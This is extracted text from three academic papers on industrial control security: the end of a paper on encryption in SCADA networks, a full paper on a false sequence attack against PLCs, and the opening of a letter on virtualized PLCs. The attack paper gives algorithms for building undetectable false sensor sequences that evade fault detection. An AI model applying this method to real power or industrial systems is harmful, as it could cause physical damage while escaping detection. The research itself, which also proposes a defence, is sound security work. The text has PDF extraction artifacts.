ily replaced: An effective SCADA system should include theproper complement of spare components that the operator can swap out easily for troubleshooting purposes. 2The lower visibility of data induced by encryption can negativelyaffect these health checks, and key management issues canimpact prompt replacement of components. Third-party network access. A common SCADA practice is to hire an external party to evaluate the system, either as partof a health check or risk assessment [31], or for emergencytroubleshooting. As part of this, the external party wouldplug a (possibly unauthenticated) external device (laptop) at different points of the communication network, and evaluate the systems and communication visible there. As even au-thenticated devices do not normally get the decryption keysfor sessions between other devices, encryption might hinderthis practice by limiting what communications are visible tothe external device. The examples above show that encryption increases trou- bleshooting complexity by making analysing problems andreplacing components more involved. The exact impact maydiffer per scenario; a more formal general statement wouldrequire going into SCADA troubleshooting and recoverycommon practices in detail. Still, we believe the issuesobserved above are representative and con rm our thesis thatencryption increase troubleshooting and recovery costs. IX. C ONCLUSIONS This paper is meant as a critical analysis of the pro s and con s of network encryption for ICS. We observedthree general principles: First, in the majority of cases,the introduction of encryption does not yield extra security.Second, encryption can actually have negative consequences for security by hindering other security mechanisms such as NIDS. Third, encryption can raise the costs of trou-bleshooting and recovery considerably. Of course, beforedrawing conclusions one has to consider the criticality of thetarget ICS, as well as its speci c requirements: for example,systems dealing with user data such as advanced meteringinfrastructures (AMI) will need stronger con dentiality. Cur-rently, though, in typical ICS scenarios one needs to achieveauthentication and integrity of the communication (whoseimplementation is easier and has less impact on the generalsystem), rather than the con dentiality offered by encryption.We cannot predict any new attacks or future changes to thethreat landscape that might change this priority. We do not advocate for completely discarding encryp- tion for ICS network traf c, but assert that blanket use of encryption on SCADA networks can prove both costlyand detrimental to security. Instead, careful consideration ofwhat encryption is actually good for, and at what cost, isneeded both for standardization efforts, and SCADA system deployment. 2www.tpomag.com/online exclusives/2013/07/scada troubleshooting tips help systems runsmoothlyREFERENCES [1] RISI Online Incident Database. http://www.risidata.com/Database. [2] APT1: Exposing One of China s Cyber Espionage Unit. Technical report, Mandiant, 2013. [3] Cyberespionage attacks against energy suppliers, version 1.21. Tech- nical report, Symantec, 2014. [4] Energetic Bear - Crouching Yeti. Technical report, Kaspersky, 2014. [5] Annual Threat Report. Technical report, Dell, 2015. [6] IEC 62351: OPC Uni ed Architecture . International Electrotechnical Commission, 2015. [7] Year in Review. Technical report, NCCIC/ICS-CERT, 2015.[8] IEC 62351 (2016-09): Power systems management and associated in- formation exchange - Data and communications security . International Electrotechnical Commission, 2016. [9] David Bailey and Edwin Wright. Practical SCADA for industry . Newnes, 2003. [10] Stewart Baker, Shaun Waterman, and George Ivanov. In The Cross re. Technical report, McAfee, 2010. [11] Manuel Cheminod, Luca Durante, and Adriano V alenzano. Review of security issues in industrial networks. IEEE Transactions on Industrial Informatics , 9(1):277 293, 2013. [12] Tim Conway, Robert M. Lee, and Michael J. Assante. Analysis of the cyber attack on the Ukrainian power grid. Defense use case. Technical report, SANS ICS, 2016. [13] E. Costante, J.I. den Hartog, M Petkovi c, S. Etalle, and M. Pech- enizkiy. Hunting the unknown - white-box database leakage detection.InDBSEC, LNCS 8566 , pages 243 259, 2014. [14] Nicolas Falliere, Liam O Murchu, and Eric Chien. W32. stuxnet dossier. White paper , Symantec Corp., Security Response , 5(6), 2011. [15] FBI. Vulnerabilities in Tridium Niagara Framework Result in Unau- thorized Access to a New Jersey Company s ICS, 2012. [16] ICS-CERT. Advisory ICSA-10-090-01: Mariposa Botnet, 2010.[17] S. Kent. IP Authentication Header. RFC 4302, 2005. [18] S. Kent. IP Encapsulating Security Payload (ESP). RFC 4303, 2005. [19] S. Kent and K. Seo. Security Architecture for the Internet Protocol. RFC 4301, 2005. [20] HyungJun Kim. Security and vulnerability of SCADA systems over IP-based wireless sensor networks. International Journal of Distributed Sensor Networks , 2012. [21] Joel Langill. Defending Against the Dragon y Cyber Security Attacks. Technical report, Belden, 2014. [22] Joel Langill, Emmanuele Zambon, and Daniel Trivellato. Cyberes- pionage campaign hits energy companies. Technical report, Security Matters, 2014. [23] Ralph Langner. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy , 9(3):49 51, 2011. [24] Ralph Langner. To Kill a Centrifuge. Technical report, Langner Group, 2013. [25] David McMillen. Security attacks on industrial control systems. Technical report, IBM, 2017. [26] Nell Nelson. The Impact of Dragon y Malware on Industrial Control Systems. Technical report, SANS ICS, 2016. [27] Adam Slagell. Thinking critically about computer security trade-offs. Skeptical Inquirer , 2016. [28] A. Sperotto, G. Schaffrath, R. Sadre, C. Morariu, A. Pras, and B. Stiller. An overview of ip ow-based intrusion detection. IEEE Communications Surveys and Tutorials , 12(3):343 356, 2010. [29] Keith Stouffer, Suzanne Lightman, Victoria Pillitteri, Marshall Abrams, and Adam Hahn. Guide to industrial control systems (ICS) security , volume 800. NIST, 2014. [30] V erizon RISK Team. Data breach digest, 2016. [31] V erizon RISK Team. Data breach digest, 2017. [32] Daniel Trivellato and Dennis Murphy. Lights out! Who s next? Technical report, Security Matters, 2016. [33] Y ongge Wang. sSCADA: securing SCADA infrastructure communi- cations. Int. J. Communication Networks and Distributed Systems , 6(1):59, 2011. [34] Wonderware Invensys Systems. Securing Industrial Control Systems , 1.4 edition, 2007. [35] Omer Y uksel, Jerry den Hartog, and Sandro Etalle. Towards useful anomaly detection for back of ce networks. In ICISS, LNCS 10063 , pages 509 520. Springer International Publishing, 2016. [36] Bonnie Zhu, Anthony Joseph, and Shankar Sastry. A taxonomy of cyber attacks on SCADA systems. In iThings/CPSCom , pages 380 388. IEEE, 2011. 6IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 294Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply.
Encryption in ICS networks: a Blessing or a Curse? Davide Fauri1, Bart de Wijs2, Jerry den Hartog1, Elisa Costante3, Emmanuele Zambon3and Sandro Etalle1,3 1Technische Universiteit Eindhoven {d.fauri,j.d.hartog,s.etalle }@tue.nl2ABB Group [email protected] [email protected] [email protected]
Construction_of_false_sequence_attack_against_PLC_based_power_control_system.pdf
It is essential to ensure accurate sensor measurements to safely regulate physical process in power control system. Traditional false data injection (FDI) attacks against control system mainly require the attackers to obtain the optimal maliciousinputs. Different from the traditional FDI attacks, we present false sequence attack that can disable the fault detection againstProgrammable Logic Controllers (PLCs) with partial information about the victim system. Our attack formulation is to identify adiscrete event model of collected fault-free I/O traces from compromised PLCs, and nd the undetectable false sequences that areselected as desired attacks injected into compromised sensors from the identi ed model. A representation industrial simulationshows that we construct the false sequence attack against the control system with fault detection. Key Words: power control system, false sequence attack,false data injection, discrete event model, fault detection
Construction of False Sequence Attack Against PLC based Power Control System Min Xiao, Jing Wu , Chengnian Long, Shaoyuan Li Department of Automation, Shanghai Jiao Tong University and Key Laboratory of System Control and Information Processing, Ministry of Education, Shanghai 200240, P . R. China E-mail: [email protected] 1 Introduction Control systems as the fundamental components of cyber- physical critical infrastructures have been widely used inpower grids. On account of their crucial role in modern in-dustrial society, they are becoming highly vulnerable targetsfor adversaries causing malicious damage. Traditional safetyprotection is mostly through cyber security solutions and ef- cient to prevent the virus invasion into the industrial net-work. However, recent research has demonstrated that nocontroller code with existential threat is allowed to be exe-cuted after it passed physical safety checks with the TrustedSafety V eri er (TSV) [1]. Moreover, intruding the host sys-tem like Stuxnet malware [2, 3] is very challenging job inview of well-protected control networks. Therefore, moreand more interests have been paid to traditional false data in-jection (FDI) attacks, which do not require to break throughhardened industrial control network to upload the maliciouspayload in the power control system. In recent years, more and more security researches have been focused on FDI attack in power grids. From the viewof system s topology, Liu et al. [4] announced that false datainjection attacks could introduce arbitrary errors into certainstate variables which mislead the state estimation processwithout being detected by bad measurement detection. Yanget al. [5] implemented FDI attack on various IEEE standardbus systems, and proved its advantage over a baseline strat-egy of random selections. However, the above FDI attacksis feasible with the assumption that whole system s con g-uration or topology is available and a great number of com-promised sensors of large power system is accessible, whichare hard to implement during the actual operation. From theview of cyber-physical platforms, Mclaughlin et al. [6] pro-posed FDI attack against PLC through the controller s be-havioral model to search the optimal input vector to destroythe control system. Pang et al. [7] presented stealthy falsedata attacks, which can thoroughly destroy the normal op- *This work is supported by National Natural Science Foundation of China (Grant Nos. 61172064, 61473184).eration of the output track control systems. Both of them ignore mature solution of fault detection [8 10], which are applied to the intelligent controller such as PLC. In this paper, we present false sequence attack against PLCs, which can disable the fault detection in PLCs. Onlyfew compromised sensors and suf cient signal sequence(I/O vectors) monitored between PLC and actual plant are re-quired to be controlled during the construction of the attack.Moreover, we analyze and model the collected fault-free I/Otraces of compromised PLCs to nd false sequences, whichcan be injected into inputs of remote sensors to damage thecontrol system and cannot be detected by fault detection. Itis noteworthy that under the condition of existing fault detec-tion, we take advantage of fault-tolerance rate kto construct false sequences based on identi ed model. We organize the rest of this paper as follows: in Section 2, we give the formulation of our false sequence attack. In sec-tion 3, we present the modeling of PLC-based control sys-tem and construction of false sequence attack. In section 4,we provide a representative industrial simulation and obtainsome simulation results. In Section 5, we will draw someconclusions. 2 Problem Formulation Considering the threat model described in Fig. 1, attack- ers only need to access and confuse the remote less-protectedsensors of control system that are distributed geographicallyacross the country. Then, the attack can indirectly per-form malicious damage to human-machine interface (HMI)whose inputs come from remote sensors of remote termi-nal units (RTUs) or PLCs through the heterogeneous com-munication networks. To prevent the anomalies caused byphysical faults, every smart controller deploys the fault de-tection mechanism. To make sure the feasibility of our at-tack, we assume that the attackers get hold of the high-levelinfrastructural con guration, such as connecting relation-ship between the sensors/actuators and RTUs or PLCs in-puts/outputs, which is not hard to access in practice. With theabove knowledge the attackers construct the false sequenceattack to inject into compromised sensors which send mis-guided measurements to the PLC.Proceedings of the 35th Chinese Control ConferenceJul y 27-29, 2016, Chen gdu, China 10090Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Figure 1: The threat model for false sequence attack However, the challenge is how to construct the attack that makes PLCs perform malicious actions with the mature faultdetection deployed in the control system. One of the maintask for false sequence attack is to analyze and disable thefault detection. False sequences attack is essentially to ex-ploit the vulnerability of fault detection principle that wasmerely designed to solve the random fault problem, andsend undetectable and corrupted measurements to the PLCthrough compromised remote sensors. Fig. 2 shows how theattack is constructed. We assume the adversaries have accessto signal or stack traces exchanged between PLC controllerand plant. With the inputs and outputs vector databases, weidentify the discrete event model that is fault-free similarly to modeling approach of fault detection. Finally, we searched for all the sets of undetectable false sequences that cause themalicious system behavior from identi ed model. The spe-ci c search algorithm is discussed in next section. Note thatobtaining appropriate length of false sequences is crucial inwhole traversal process. Figure 2: Construction of the false sequence attack 3 Modeling and construction of false sequence at- tack We require a formal description to identify m-behaviors for BEHm Ident and to observe m-behaviors for BEHm Obs, which is brought in to quantify the exceeding m-behaviors generated by the identi ed model. The identi cation goalis to minimize the amount of exceeding m-behaviors for a given value of identi cation parameter m. Rather, It is ob- vious that BEH m Ident is equal to BEHm Obs. Then we perform the false sequences on the basic of identi ed model. 3.1 Data collection and formal de nition of observed behavior We can collect sampled data between PLC and controller through capturing the signals after they have been gatheredby the PLC controller [8]. Fig. 3 shows the widely adapted method to capture I/O vector sequences from PLC that canbe used to monitor the compromised data by attacker. Wecollect the data to form the identi cation database at eachend of I/O vector calculus through the OPC communicationmode. Figure 3: PLC cycle and data collection After implementing the collection of data, we need to de- ne the observed input/output (I/O) sequence, language andbehaviors of the collected data. Before we start, we intro-duce the following de nition. De nition 1: The set of the observed I/O sequence of the collected data with rinputs and soutputs is denoted as =( 1,..., p) (1) where i=(ui(1),ui(2),...,ui(|ui|)),ui(j)is the j-th output in the i-th of I/O vector u,andu= (I1,...,Ir,O1,...,Os)=(IO1,...IOm)withm=r+s. We assume that for two successive I/O vectors u(t)/negationslash= u(t+1) holds to make sure that an I/O vector is supposed to be a new one if and only if at least one I/O vector changed. De nition 2: The observed language set and behavior of collected data: the observed language of length qas set of observed I/O vectors sequences of length q. Lq Obs=/uniondisplay i /parenleftBig| i| q+1/uniondisplay t=1(ui(t),ui(t+1),...,ui(t+q 1))/parenrightBig With the observed language set, the observed behaviors of lengthnare de ned as: BHEn Obs=n/uniondisplay i=1Li Obs (2) 3.2 Model identi cation 3.2.1 Model class The aim of identi cation is to make sure that the iden- ti edm-behaviors BEHm Ident is equal to the observed m- behaviors BEHm Obs wheremcan be any available value. Brie y, the identi ed model will reproduce the language ofthe PLC-based control system. The considered system is thecoupled system of well-programmed controller and physi- cal plant which is regarded as non-deterministic. Hence, we present the Non-Deterministic Autonomous Automaton withOutput (NDAAO) [10] that is suited to model our system. 10091Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. De nition 3: A non-deterministic autonomous automa- tion with output (NDAAO) is a ve-tuple NDAAO =(X, ,fnd, ,x0) with X=x0,...,x|x| 1is the nite set of states. = 1,..., | |is the nite set of output symbols. fnd:X 2Xis the non-deterministic transition func- tion. :X is the output function associating each state with an output symbol. x0is the initial state. The NDAAO can be represented by a digraph G= (V,E). The vertex set of Gis the set of all states in the NDAAO: V(G)=X The edge set of Gis represented by the transition function fnd: E(G)=/braceleftbig (xi,xj) X X:xj fnd(xi)/bracerightbig With each node associating with output (xi)of the corre- sponding state xi, Fig. 4 shows an simple example which helps to represent graphical NDAAO. Figure 4: Graphical representation of a NDAAO De nition 4: Word set and behavior of the NDAAO: the set ofn-length words generated by NDAAO starting in xiis Wn xi= w n|w=/parenleftbig (x(1),..., (x(n)))/parenrightbig : [ /parenleftbig x(1),...,x(n)/parenrightbig :x(1) =xi X, and 1 t n 1,x(t+1) fnd(x(t))] (3) Then the set of words of length ngenerated by NDAAO is Wn(NDAAO )=/uniondisplay xi XWn xi(4) With the description of word set, we can obtain the identi ed n-behavior of NDAAO, that is BEHn Ident=n/uniondisplay p=1Wp(NDAAO ) (5) De nition 5: An identi ed event vector (j)is the vari- ation between two adjacent identi ed output vector (j) and (j+1 ) of the NDAAO; it is formulated as = (j+1 ) (j). An input event vector I( (j))is the two adjacent input of identi ed output vector I(j),I(j+1) and a output event vector O( (j))has the similar de nition. The speci c formulation is showed as: (j)=m/uniondisplay l=1 Il1or Ol1,i fIl(j+1) Il(j)=1 Il0or Ol0,i fIl(j+1) Il(j)= 1 /epsilon1, if I l(j+1) Il(j)=0 (6)Considering the I/O vector sequence involving two in- puts and one output, we have =(A,B,C)=( 0 10 , 1 10 , 1 01 ) This sequence can be represented as : A I11 BI20,O11 C =AI11,I20,O11 C 3.2.2 Identi cation algorithm We present an identi cation algorithm generating the NDAAO that showed in the previous section. We de ne anidenti cation parameter kthat determines the length of I/O vector sequences which are used to create new states. Theidea of parameter kservers to produce the k-behaviors of NDAAO that is exactly equal to the n-behaviors generated from observed vector. The produced NDAAO is called n- complete. The construction of the NDAAO is mainly divided into three steps. Firstly, we transform the observed sequence to aset of sequence of words of length kand create a set of k 1 dummy states at the beginning to be consistent with the otherwords. The part 1 of Algorithm 1 shows transformation ofthe observed sequence. Secondly, we perform the NDAAOidenti cation. The states of the NDAAO are associated withwords of length kand the transition function is represented by words of length k+1. The part 2 of Algorithm 1 shows identi cation of the NDAAO. Finally, we merge the equiv-alent states to reduce the state space. For any two states x i andxjare different, if they are associate with the same out- put and if they have the same set of successors, then we canmerge such two states to the one state. We make visual-ization of the model by drawing the graphical dot from thestates and transition function of NDAAO. Speci c algorithmis shows in part 3 of Algorithm 1. Example 1. Consider three sequences have been collected from fault-free system: 1=(A,B,C,D,E,A ), 2= (A,B,D,C,D,E,A ), 3=(A,D,B,C,D,F,E,A ). The capital letters represent different I/O vectors. Here wechoose identi cation parameter k=2 . After the transfor- mation of the sequences, we can obtain k=2 1=(AA,AB,BC,CD,DE,EA ) k=2 2=(AA,AB,BD,DC,CD,DE,EA ) k=2 3=(AA,AD,DB,BC,CD,DF,FE,EA ) and k=3 1=(AAA,AAB,ABC,BCD,CDE,DEA ) k=3 2=(AAA,AAB,ABD,BDC,DCD,CDE,DEA ) k=3 3=(AAA,AAD,ADB,DBC,BCD,CDF, DFE,FEA ) After getting k=2and k=3, we obtain the states from k=2and transition function from k=3according to the part 2 of Algorithm 1. The corresponding graph is shown inthe Fig. 5. 10092Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Algorithm 1 Construction of the NDAAO Input: observed I/O sequence and identi cation parameter k Output: the NDAAO and digraph G=(V,E); //Part1: transformation of the observed sequence 1:foreach i do 2: ifui(1)/negationslash=ui(| i|)then 3: Remove ifrom ; 4: Return; 5: else 6: i(t)=/braceleftBigg ui(1),f o r1 t k 1 ui(t k+1),f o r k t k+| i| 1 7: form=1to| i|do 8: wi(m)=( i(m),..., i(m+k 1); 9: end for 10: k i=(wi(1),...,w i(| i|); 11: end if 12: end for 13: k=| |/uniontext i=1 k i; //Part2: identi cation of the NDAAO 14:Initialize the states X= , transition function fnd(x0)= , output = , initial state x0= k[0][0] , nodesN= and edgesE= ; 15: for all such that kdo 16: for all such that do 17: X X ; 18: (| |); 19: end for 20: end for 21: for all such that k+1do 22: for all such that do 23: x [1 k]; 24: fnd(x)= [k | |]; 25: end for 26: end for //Part3: reduction of the state space and graphical representa- tion 27: for allxi,xjsuch that xi,xj Xandi/negationslash=jdo 28: if (xi)= (xj)andfnd(xi)=fnd(xj)then 29: mergexiandxj, deletexi(xj)fromXand replace fnd(x)=xi(xj)withfnd(xpre)=xj(xi), herexpreis the predecessor of xi(xj); 30: end if 31: end for 32:V V X; 33:E E (x,fnd(x)); 34:Graw(G(V ,E)); Figure 5: Identi ed NDAAO after the second step of the identi cation algorithm The primary identi ed model has redundant states and edges than those of the original model, hence reduce the statespace according to the part 3 of Algorithm 1 to simplify pri-mary model. For example, if we merge the state DB withthe stateAB, stateBA with the state EA and the state BC with the state DC, and replace the k-length word with x ifor xi X. we will get the simpli ed NDAAO in the Fig. 6. Figure 6: Finally identi ed NDAAO after merging equiva- lent states 3.3 Construction of False Sequence Attack After we identify the NDAAO which is fault-free, we can take advantage the principle of fault detection to constructundetectable false sequences. As we all know, fault detec-tion is to determine whether every current observed I/O vec-tor according with the output of the identi ed NDAAO. If theresult is true, it is considered that the current vector is legal,otherwise, false alert. In our approach of attack, we con-struct the false sequence attack, which is not only satisfyingthe same output from the identi ed model that ensure the at-tack cannot be detected, but also causing the malicious sys-tem behavior through choosing appropriate length of falsesequences with false actuating logic. The speci c formal de-scription of the false sequence of length nstarting with x iis de ned as follows, Sn xi= s n|s=/parenleftbig (x(1),..., (x(n)))/parenrightbig (s/ Ln Obs):[ /parenleftbig x(1),...,x(n)/parenrightbig :x(1) =xi X, and 1 t n 1, x(t+1) fnd(x(t))] (7) The above de nition Sn xiconstructs the sequences of lengthnthat are intercepted from the identi ed NDAAO and different from any sequence of observed I/O vectors. There-fore, the de ned false sequence attack can be the potentialharmful intrusion when injected into compromised sensors.Since the reduced NDAAO is (k+1) -complete, the follow- ing equation is set up. m k+1,BEH m Obs=BEHm Ident (8) According to the above theory, only the sequences whose lengths are not less than k 2inSn xican be the false se- quences. We obtain all sets of false sequences generatedfrom NDAAO based on identi cation parameter kis A k=/uniondisplay xi X/parenleftbigmax(| d|)/uniondisplay n=k+2(Sn xi)/parenrightbig , d (9) Since we propose the de nition of false sequence, the next step is to present search algorithm to obtain all the sets ofundetectable false sequences. Algorithm 2 shows that usingrecursion formula of IncSearching can gradually get the false sequences whose length is not less than k+2and those sequences that selected from the NDAAO and disparate from 10093Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. any subsequence of observed I/O vectors start with state xinit. With the output of the IncSearching we acquire all sets of the sequences Akthrough merging all Sxinitwith all start state xinitcoming from states Xof the NDAAO as fol- low, Ak=/uniondisplay xinit X/parenleftbig Sxinit/parenrightbig (10) Algorithm 2 IncSearching Input: the identi ed NDAAO, observed I/O sequence , identi - cation parameter kand initial state xinit Output: the sets of false sequences Sxinit; 1:foreachx xinit do 2:xinit=fnd(x) 3:seq.append(x) 4:IncSearching (NDAAO, ,k,x init) 5: if|seq| (k+2 ) andseq / substring ( )for then 6:Sxinit.append(seq) 7: end if 8:seq.pop() 9:end for 10:ReturnSxinit By Algorithm 2, the obtained sets of un- detectable false sequences of Example 1 are(A,D,B,D,... ),(...,D,C,D,F,... ),(A,B,C,D,F,... ), where the apostrophes before or after the letter can be anypredecessors or successors of the letter. Because attackers might have limited control over limited compromised sensors coming from control system, we re-quire to determine controller I/Os which have changed be-tween two consecutive vectors of false sequences generatedfrom above method. 3.4 Feasibility and Performance Evaluation There are two main reason to support the feasibility of my work. Firstly, with the identi cation parameter kincreas- ing, the states of NDAAO increase rapidly and can be harderto converges to a stable level according to the system evo- lutions in chronological order [10]. Hence, it is dif cult to handle the huge calculation when proceeding on line detec-tion under the condition of the large value k. We mostly implement off-line attack and have enough time to carry outcalculation. Secondly, due to the stability and performanceof detect mechanism, in actual industrial system generally asmall parameter kis enough to meet practical requirements based on fault detection [8]. To evaluate the connectivity of the NDAAO, we will give information about the mean number of edges originatingfrom a state. We de ne the structure complexity metric C s as: Cs=/summationtext xi X(deg(xi)) |X|(11) heredeg(xi)=|fnd(xi)|is the degree of a state. Similar to the complexity metric, we de ne the attack vulnerability index to measure the success rate of the falsesequence searched from the identi ed NDAAO. The attackvulnerability index is shown as: C n A=|/uniontext xi X(An xi)| |Wn Ident|(12)By equation (11) and (12), we can obtain the ratio of the multiple branch state from all states and ratio of the falsesequence from all identi ed I/O sequences. 4 Case Study To demonstrate the feasibility and performance of the pro- posed method for false sequence attack, a case study is pre-sented. The considered system is a small sorting system ofgoods and the function of this system is to sort parcels ac-cording to their size. The system has 11 inputs (measure-ments from the system) and 5 outputs (signals from PLC tothe actuators). Fig. 7 shows the layout of the sorting systemof goods. Figure 7: Sorting system of goods Figure 8: Part of NDAAO The identi cation database is composed of 50 ob- served cycles of operation and every cycle is col-lected at the right time of the arrival of a parceland its sorting. The vector entries are all formed as[A+,A ,B,C,D,k 1,k2,a0,a1,a2,b0,b1,c0,c1,d0,d1]. After the identi cation process and reduction of the states,the part of NDAAO model with the identi cation parameter k=2 is shown in g. 8. By the obtained model, we implement false sequence searching process and before simpli cation we havesearched plenty of different length of false sequences thatcan be potentially as the malicious logic orders of data in- 10094Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply. Figure 9: Amount of false sequences changes with length Figure 10: Relation between CsandCn A jected into compromised sensors. Such as A1=Q34Q21Q22Q30 A2=Q32Q10Q11Q12Q28 A3=Q16Q17Q18Q19Q20Q34 whereQiis the output of each vector of the observed cycles. However, the above sequences require all the compro- mised sensors if adversaries carry out attacks. So we needto simplify the searched sequences using event vector fromthe equation (6) and processed above sequences list as fol-lows, A 1=Q34d11,b01,{b00,d01} Q30 A2=Q32d11,b11,k21,{b10,d01} Q28 A3=Q16{k10,a00,c11d10},a11,a10,k21,{a21,c10} Q34 Here symbol sequences of each arrow divided by comma are sets of single event input between every two vectors of thefalse sequences. When we implemented the process of sort- ing goods with injecting these false sequences, the sortingprocess obtained the wrong sort results without being de- tected by fault detection. From the obtained false sequences, we nd that most of the false sequences are concentrate on the lengths between19 and 26. So the potentially malicious attack can select from false sequences of such lengths. Fig. 9 shows theamount of false sequence changes with length under differ-entk. Considering the feasibility of the attack and the larger state s degree the more multiple branch state, Fig. 10 showsthat with the structure complexity metric C s(ratio of the multiple branch state) decreasing, the attack vulnerability in-dex (ratio of the false sequence) drops quickly. Hence, wecan detect such attack through add the detection on multiplebranch states without deliberately increasing identi cationparameter k. 5 Conclusion In this paper, we have presented false sequence attack as one way to nd the undetectable false sequence attackagainst control system from I/O traces of compromisedPLCs. The obtained false sequence attack will be used asmalicious logic attack injected into remote sensors moni-tored by PLCs to damage the control system. We have given a whole implementation of the construction of false sequence attack including the search algorithm of false se-quence. The detection on multiple branch states will becomean effective defense against such attacks. Simulation showsthat our method is a practical threat against the control sys-tem with fault detection, which illustrate the effectiveness ofour proposed method. References [1] S. McLaughlin, S. Zonouz, D. Pohly, P . McDaniel, A trusted safety veri er for process controller code, In Proc. Network and Distributed System Security Symposium , 2014: 634-645. [2] S. McLaughlin, On Dynamic Malware Payloads Aimed at Pro- grammable Logic Controllers. In 6th USENIX Workshop on Hot Topics in Security , 2011:367-374. [3] D. Beresford, Exploiting Siemens Simatic S7 PLCs. In Black Hat USA , 2011,16(2):723-733. [4] Y . Liu, P . Ning, M.K. Reiter, False data injection attacks against state estimation in electric power grids, ACM Trans- actions on Information and System Security (TISSEC) , 2011, 14(1): 13. [5] Q. Yang, J. Yang, W. Y u, On false data-injection attacks against power system state estimation: Modeling and countermea-sures, Parallel and Distributed Systems, IEEE Transactions on , 2014, 25(3): 717-729. [6] S. McLaughlin, S. Zonouz, Controller-aware false data in- jection against programmable logic controllers, Smart Grid Communications (SmartGridComm), 2014 IEEE International Conference on. IEEE , 2014: 848-853. [7] Z. Pang, F. Hou, Y . Zhou, D. Sun, False data injection at- tacks for output tracking control systems, Control Conference (CCC), 2015 34th Chinese , 2015: 6747-6752. [8] M. Roth, S. Schneider, J.J. Lesage, Fault detection and isola- tion in manufacturing systems with an identi ed discrete event model, International Journal of Systems Science , 2012, 43(10): 1826-1841. [9] D. Garcia-Alvarez, M.J. Fuente, G.I. Sainz, Fault detection and isolation in transient states using principal component analysis, Journal of Process Control , 2012, 22(3): 551-563. [10] S. Klein,S. Litz, J.J. Lesage, Fault Detection of Discrete Event Systems Using an Identi cation Approach, in Proceedings of the 16th IF AC World Congress ,2005: 17-22. 10095Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:50 UTC from IEEE Xplore. Restrictions apply.
Virtualizing_Programmable_Logic_Controllers_Toward_a_Convergent_Approach.pdf
Modern programmable logic controllers (PLCs) are pervasive components in industrial control systems (ICSs) suchas supervisory control and data acquisition, designed to controlindustrial processes autonomously or as part of a distributedsystem topology. Its success may be explained by its robustnessand reliability, being one of the most enduring legacies on modernICS, despite having evolved very little over the last years. Thisletter proposes an x86-based virtual PLC (vPLC) architecturethat decouples the logic and control capabilities from the I/Ocomponents, while virtualizing the PLC logic within a real-timehypervisor. To demonstrate the feasibility of this concept, thetopic of real-time virtualization for x86 platforms is analyzed,together with an evaluation study of the properties of real-timeworkloads in partitioned hypervisor environments.
IEEE EMBEDDED SYSTEMS LETTERS, VOL. 8, NO. 4, DECEMBER 2016 69 Virtualizing Programmable Logic Controllers: Toward a Convergent Approach Tiago Cruz, Paulo Sim es, and Edmundo Monteiro Index Terms Converged infrastructures, industrial control systems (ICS), virtualization. I. I NTRODUCTION IN RECENT years, supervisory control and data acquisition (SCADA) industrial control system (ICS) a kind of sys- tems used for controlling industrial processes, power plants,or assembly lines have become a serious concern becauseof manageability and security issues. This comes as a con- sequence of years of air-gaped isolation, together with the increased coupling of ICS and IT systems and the absenceof proper management and security policies, exposing ICSto all sorts of threats. Suddenly, ICS faced a reality that has been familiar for IT infrastructure managers for decades, which led to the development of speci c tools and protocols,as well as the establishment of management frameworks andsecurity-oriented policies. However, bridging the gap between IT and ICS is not a triv- ial matter of transposing technologies from one domain to the other. This is due to the fact that the primary ICS design andoperation concerns are focused on reliability and operationalsafety, advising against any mechanism or solution with poten-tial impact on operational performance indicators. Despite the efforts to develop domain-speci c security and management capabilities for SCADA ICS, most of these solutions try to x what is wrong without introducing signi cant change into Manuscript received May 19, 2016; revised September 4, 2016; accepted September 8, 2016. Date of publication September 12, 2016; date of current version November 22, 2016. This work was supported by the EU ATENAH2020 Project (H2020-DS-2015-1 Project 700581). This manuscript wasrecommended for publication by S. Parameswaran. The authors are with the Department of Informatics Engineering, University of Coimbra, 3030-290 Coimbra, Portugal (e-mail: [email protected] ; [email protected] ;[email protected] ). Color versions of one or more of the gures in this paper are available online at http://ieeexplore .ieee .org. Digital Object Identi er 10.1109/LES.2016.2608418existing architectures, which still struggle to deal with lifecycle operations or change management. In this letter, we propose an innovative approach for ICS infrastructure consolidation, which bridges computing and net- working virtualization technologies with ICS and targets a vital SCADA ICS component: the programmable logic con-troller (PLC). Despite being a mature concept that incarnatesa design philosophy well established across the industry, PLCsare one of the most vulnerable components on ICS, due to design (e.g., most PLCs lack redundant units such as power supplies) or cyber-security issues (as demonstrated byStuxnet [ 1]). By leveraging virtualization and advanced com- munication technologies to decouple the PLC physical I/O andcomputing capabilities, we may turn it into a real-time virtual machine (VM) hosted on a real-time hypervisor, connected to I/O modules on the eld using a switched deterministic and/orreal-time Ethernet fabric system, with bene ts in terms ofresource consolidation, security, resiliency, and manageability. II. T OWARD VIRTUALIZED PLC Modern PLCs are a class of embedded systems which incorporate technologies such as microprocessors and micro-controllers, real-time operating systems (RTOS) (hosting theexecution environment for the main functions and services), and communication capabilities (from serial point-to-point or bus topologies to Ethernet and TCP/IP). PLC hardwaregenerally includes analog or digital I/O modules, eldbusinterconnects, or serial communication interfaces, being occa-sionally coupled with eld-programmable gate arrays (FPGA) or digital signal processors (DSP) for real-time signal process- ing. Since a considerable share of these devices use commodityinstruction set architecture CPUs (such as x86 or advancedRISC machines), the possibility of virtualizing them comes tomind, which is one of the main requirements of the virtual PLC (vPLC) architecture, discussed in this section. A. PLCs and Real-Time Virtualization on x86 Platforms The recent trend toward IT service and infrastructure consol- idation owes much of its success to virtualization technologies.This has provided the means to effectively leverage comput-ing and communication resources, introducing a great deal of exibility, while also streamlining and simplifying day-to-day operations. For instance: by creating a VM snapshot before applying a security patch, changes can be rolled back in caseof failure; VMs can be cloned for sandboxed testing, prior todeployment into production; also, VM instances can be livemigrated, allowing for reduced downtime every time a physical device needs to be stopped. Unlike what happened in the IT domain, the introduc- tion of virtualization 